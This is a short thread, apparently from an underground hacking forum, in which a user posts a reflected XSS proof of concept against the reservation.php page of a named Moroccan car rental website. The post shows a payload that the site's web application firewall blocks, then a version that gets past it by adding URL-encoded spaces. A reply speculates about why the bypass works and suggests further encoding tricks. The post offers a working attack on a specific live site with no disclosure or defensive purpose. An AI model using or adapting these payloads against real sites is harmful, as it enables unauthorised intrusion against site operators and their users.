Upgrade your account to access Premium section
Access to DarkForums Private Archive Telegram Channel
Old Telegram is Banned Join our new Telegram Channel

Webmaster waf Bypass on site spotcar Morroco
by zozivuln - 05-06-25, 02:28 AM
DarkForums Members Offline
Members

Posts 13
Threads 9
Joined May 2025
Reputation 6
2 Months
#1
05-06-25, 02:28 AM
POC WAF BLOCKED : [url=https://www.spotcar.ma/reservation.php?id=2"><Img%20Src=OnXSS%20OnError=alert("XSS")>]https://www.spotcar.ma/reservation.php?id=1"><Img%20Src=OnXSS%20OnError=alert("XSS")>[/url]

add behind behind payload this => %20%20%20" 

POC WAF BYPASSED : [url=https://www.spotcar.ma/reservation.php?id=1%20%20%20"><Img%20Src=OnXSS%20OnError=alert("XSS")>]https://www.spotcar.ma/reservation.php?id=1%20%20%20"><Img%20Src=OnXSS%20OnError=alert("XSS")>[/url]

fbichan fbichan ​​​​​​​ fbichan
Reply
DarkForums Members Offline
Members

Posts 6
Threads 2
Joined Jul 2025
Reputation 0
3 Weeks
#2
13-07-25, 09:30 PM
They don't have validation, could be why it bypassed it, but i still don't understand why that went through, ping me if you get your hands on the source code.

maybe try to also url encode every special character, without the 3 spaces.
Reply


Forum Jump:


 Users browsing this thread: 1 Guest(s)